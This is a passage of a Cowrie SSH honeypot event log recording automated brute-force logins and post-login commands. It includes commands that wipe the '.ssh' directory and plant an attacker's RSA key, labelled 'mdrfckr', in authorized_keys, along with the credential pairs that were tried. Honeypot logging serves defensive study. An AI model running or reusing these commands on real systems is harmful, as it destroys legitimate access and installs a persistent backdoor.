02\\x01\\x03\\x02\\x02\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\t\\x08\\x03\\x04\\x03\\x03\\x03\\x02\\x03\\x01\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8o\\x88\\x89\\x1auZ\\xbc\\x84\\x17\\xe8\\xf1\\xa4\\xf6%\\x8a\\xe3\\x89a\\x9a\\xe1\\xfd|-\\x91\\xaa\\xd24\\x07\\xca\\xec]\\x00\\x15\\x00\\xb7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-09-08T23:14:11.511962Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:12.111909Z","src_ip":"212.227.125.160","session":"cbc50ce047b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44086,"dst_ip":"1.2.3.4","dst_port":22,"session":"dab94d070e31","protocol":"ssh","message":"New connection: 212.227.235.229:44086 (1.2.3.4:22) [session: dab94d070e31]","sensor":"my-vps","timestamp":"2025-09-08T23:14:26.010469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:14:26.023804Z","src_ip":"212.227.235.229","session":"dab94d070e31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:14:26.278489Z","src_ip":"212.227.235.229","session":"dab94d070e31"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:14:27.274738Z","src_ip":"212.227.235.229","session":"dab94d070e31"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:28.544448Z","src_ip":"212.227.235.229","session":"dab94d070e31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56388,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5cbe2bf16d","protocol":"ssh","message":"New connection: 212.227.235.229:56388 (1.2.3.4:22) [session: ba5cbe2bf16d]","sensor":"my-vps","timestamp":"2025-09-08T23:14:30.441824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:14:30.443345Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:14:30.537552Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.login.success","username":"root","password":"Zj123456","message":"login attempt [root/Zj123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:14:30.919061Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:14:31.173321Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.174088Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.175414Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.272660Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:14:31.477813Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.478608Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.576883Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.577906Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56398,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4fd7a770d93","protocol":"ssh","message":"New connection: 212.227.235.229:56398 (1.2.3.4:22) [session: f4fd7a770d93]","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.677474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.682886Z","src_ip":"212.227.235.229","session":"f4fd7a770d93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:14:31.782440Z","src_ip":"212.227.235.229","session":"f4fd7a770d93"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:14:32.185351Z","src_ip":"212.227.235.229","session":"f4fd7a770d93"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:33.287217Z","src_ip":"212.227.235.229","session":"f4fd7a770d93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56414,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd92935157db","protocol":"ssh","message":"New connection: 212.227.235.229:56414 (1.2.3.4:22) [session: bd92935157db]","sensor":"my-vps","timestamp":"2025-09-08T23:14:33.383001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:14:33.384072Z","src_ip":"212.227.235.229","session":"bd92935157db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:14:33.479513Z","src_ip":"212.227.235.229","session":"bd92935157db"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:14:33.907334Z","src_ip":"212.227.235.229","session":"bd92935157db"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:34.003295Z","src_ip":"212.227.235.229","session":"ba5cbe2bf16d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:14:34.004523Z","src_ip":"212.227.235.229","session":"bd92935157db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40806,"dst_ip":"1.2.3.4","dst_port":22,"session":"99fbd22dbdb7","protocol":"ssh","message":"New connection: 212.227.235.229:40806 (1.2.3.4:22) [session: 99fbd22dbdb7]","sensor":"my-vps","timestamp":"2025-09-08T23:15:09.901870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:09.903052Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:10.203780Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56628,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb177413e824","protocol":"ssh","message":"New connection: 212.227.235.229:56628 (1.2.3.4:22) [session: cb177413e824]","sensor":"my-vps","timestamp":"2025-09-08T23:15:11.194350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:11.195394Z","src_ip":"212.227.235.229","session":"cb177413e824"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:11.332073Z","src_ip":"212.227.235.229","session":"cb177413e824"}
{"eventid":"cowrie.login.success","username":"root","password":"net101","message":"login attempt [root/net101] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:15:11.451066Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.login.failed","username":"build","password":"123","message":"login attempt [build/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:15:11.911073Z","src_ip":"212.227.235.229","session":"cb177413e824"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:15:12.113128Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.113813Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.114830Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.416239Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52388,"dst_ip":"1.2.3.4","dst_port":22,"session":"cedfb8854113","protocol":"ssh","message":"New connection: 212.227.235.229:52388 (1.2.3.4:22) [session: cedfb8854113]","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.498550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.499767Z","src_ip":"212.227.235.229","session":"cedfb8854113"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:15:12.750825Z","src_ip":"212.227.235.229","session":"cedfb8854113"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.045539Z","src_ip":"212.227.235.229","session":"cb177413e824"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:15:13.389938Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:15:13.390693Z","src_ip":"212.227.235.229","session":"99fbd22dbdb7"}
